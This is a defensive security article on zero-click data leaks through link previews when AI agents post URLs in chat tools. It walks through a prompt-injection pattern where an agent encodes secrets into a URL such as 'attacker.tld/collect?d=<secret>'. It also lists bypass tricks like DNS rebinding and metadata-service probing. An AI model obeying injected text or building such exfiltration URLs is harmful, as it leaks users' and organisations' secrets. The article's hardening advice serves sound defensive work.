A link preview feels harmless. Your chat app fetches a title, an image, and a short snippet. No one clicks anything.
That’s the problem. Link preview attacks can turn that “helpful” fetch into a zero-click data leak, especially when an AI agent can read internal context and then generate URLs.
This piece focuses on practical defenses for teams building agents that post messages, generate links, or trigger preview fetchers in Slack, Teams, Discord, Telegram, and similar tools.
Why link previews create zero-click data exfiltration
Most messaging platforms and collaboration tools auto-fetch previews. They do it to render Open Graph cards, unfurl links, or pre-load media. If an AI agent posts a message containing a URL, the platform’s preview bot often fetches it right away.
In February 2026 reporting, researchers showed agents leaking secrets when a malicious prompt caused the agent to construct a URL that embedded sensitive data (API keys, tokens, snippets of internal text). The preview fetch then sent that data to an attacker-controlled domain without a click. See AI agents can spill secrets via malicious link previews for examples tied to real chat workflows.
Here’s the mental model: a URL is like the address line on a postcard. If you write a secret there (query string, path, fragment that gets misused), it can get copied, logged, and forwarded.
Treat every automatic preview fetch as an outbound network request that may carry data you didn’t mean to publish.
Scope note: this risk exists even if your agent never “browses the web.” It’s enough that (1) the agent can generate text containing links, and (2) some system auto-fetches previews for those links.
How secrets end up inside attacker URLs
Attackers don’t need malware. They need the agent to cooperate for one message.
A common pattern looks like this:
- An attacker sends a message that includes an instruction disguised as normal text (prompt injection).
- The agent includes sensitive context in its next response, but not as plain text. Instead, it encodes the data into a URL, often as
https://attacker.tld/collect?d=<secret>. - The chat platform unfurls the link, fetching it server-side. The attacker’s server receives the request and extracts the secret.
The “secret” can come from several places: tool output (CRM records, ticket bodies, calendar titles), long-term memory, system prompts, connected files, environment variables accidentally exposed to the model, or even earlier chat messages copied into the response.
Two details make link preview attacks easier to miss:
- Logs amplify the leak. URLs often land in proxy logs, WAF logs, browser history, and APM traces. Even if you later delete the message, the URL may already exist elsewhere.
- Redirects hide intent. The URL shown to the user can look safe, then redirect to a collector endpoint during preview fetching.
OpenAI’s January 2026 guidance summarizes this class of “URL-based data exfiltration” and why agents need strict guardrails around link handling. See Keeping your data safe when an AI agent clicks a link.
Hardening against link preview attacks (controls that survive bypass tricks)
You won’t stop every prompt injection. You can still stop most leaks by controlling what gets fetched, where it can go, and what data is allowed to enter a URL.
Before controls, it helps to name the bypasses. This table maps common tricks to matching defenses.
| Bypass technique attackers use | What it looks like | Defense that holds up |
|---|---|---|
| Canonicalization confusion | http://user@host, mixed case, trailing dots, encoded IPs | Normalize and re-parse, then compare against a strict allowlist |
| Multiple A and AAAA records | Domain resolves to one public IP and one private IP | Resolve all records, block if any are private, link-local, or loopback |
| Redirect chains | Safe domain redirects to attacker collector | Re-validate every hop, cap redirects, block cross-domain redirects |
| DNS rebinding | Domain resolves public first, private later | Pin IP per request, don’t re-resolve mid-flight, use a safe resolver |
| Metadata service probing | 169.254.169.254 and cloud variants | Network egress blocks plus explicit deny rules at the proxy |
Implementation snippets you can apply today
The safest pattern is an isolated “preview fetcher” service with no secrets, no internal network access, and tight outbound rules. Then treat preview results as untrusted input.
Below are concrete examples you can adapt (concepts stay the same across stacks):
- Egress firewall rules (block internal targets): deny RFC1918, loopback, link-local, and cloud metadata. For example, block
10.0.0.0/8,172.16.0.0/12,192.168.0.0/16,127.0.0.0/8,::1/128,fc00::/7,fe80::/10, and169.254.169.254/32. If you need a quick host-level control, rules likeiptables -A OUTPUT -d 169.254.169.254 -j REJECTandiptables -A OUTPUT -d 10.0.0.0/8 -j REJECTare a starting point, but prefer VPC or cluster-level egress policy. - Reverse proxy “choke point” (deny by resolved IP): force all preview fetches through one proxy that performs DNS resolution and blocks private ranges. This avoids “agent code paths” making direct requests. Also disable forwarding of cookies and auth headers by default.
- Safe URL fetching pseudocode (defensive, not pretty):
u = parse_url(input)if u.scheme not in {"https"}: rejectu = normalize(u) // lowercase host, strip userinfo, clean escapesif host_in_allowlist(u.host) is false: reject (or require user confirm)ips = resolve_all_A_AAAA(u.host)if any_ip_is_private_or_linklocal(ips): rejectip = pick_ip_and_pin(ips)req = new_request("GET", u, connect_to=ip)req.headers = {"User-Agent":"PreviewFetcher/1.0", "Accept":"text/html,image/*"}req.remove_headers(["Authorization","Cookie","X-Api-Key"])resp = fetch(req, timeout=3s, max_bytes=1MB, no_proxy_env=true)if is_redirect(resp): next = validate_redirect(resp.location, same_checks=true, max_hops=3)return extract_title_and_og_tags(resp) // no scripting, no forms
- Output guardrails (stop secrets entering URLs): if your agent generates links, add a post-processor that rejects URLs containing high-risk patterns. Examples: long base64 blobs,
token=,key=,sig=, or unexpected percent-encoded payloads. Pair this with a “never put secrets in URLs” rule for any tool your agent calls.
One more practical point: many preview fetchers run in the same environment as the agent. That’s convenient, but it’s risky. If the preview worker can reach internal services, attackers will try SSRF-style targets next.
For hands-on examples of how preview-driven exfil can appear in messaging apps, including testing workflows, see Data exfil from agents in messaging apps.
Copy-paste checklist for an engineering ticket
Use this as acceptance criteria for a sprint task:
- Create a dedicated preview-fetch service (or job) with no access to internal networks and no secret mounts.
- Enforce outbound egress policy that blocks private, loopback, link-local, and metadata IP ranges (IPv4 and IPv6).
- Require
httpsand normalize URLs (strip userinfo, normalize host casing, decode and re-parse). - Resolve all A and AAAA records, block if any record is non-public, pin the chosen IP for the connection.
- Re-validate every redirect hop, cap redirect count, block cross-domain redirects unless allowlisted.
- Strip sensitive headers (Authorization, cookies, API keys) from all preview requests.
- Add strict timeouts and size caps, log only minimal metadata (don’t log full URLs with query strings).
- Add an outbound DLP-style filter that rejects agent-generated URLs containing suspected secrets.
Product and UX choices that reduce the blast radius
Engineering controls help, but product defaults decide how often you face the problem.
For sensitive workspaces (security teams, finance, legal, incident response), consider disabling link previews by default for agent messages. If you can’t disable previews platform-wide, disable them for agent identities or channels that contain sensitive data.
Consent prompts also work when designed well. For example: “This link points to an untrusted domain. Generate preview anyway?” That prompt should appear before any fetch happens, not after.
The strongest option is an isolated preview service that returns a safe summary (title, domain, content-type) and never returns raw HTML. Treat it like a sanitizer, not a browser.
Conclusion
Link previews are small features with big consequences. When an AI agent can produce URLs from internal context, link preview attacks turn into quiet, fast data leaks.
Build a separate preview fetcher, lock down egress, validate DNS and redirects, and stop secrets from entering URLs. Then back it up with sensible defaults, because the safest preview is the one that never fires.

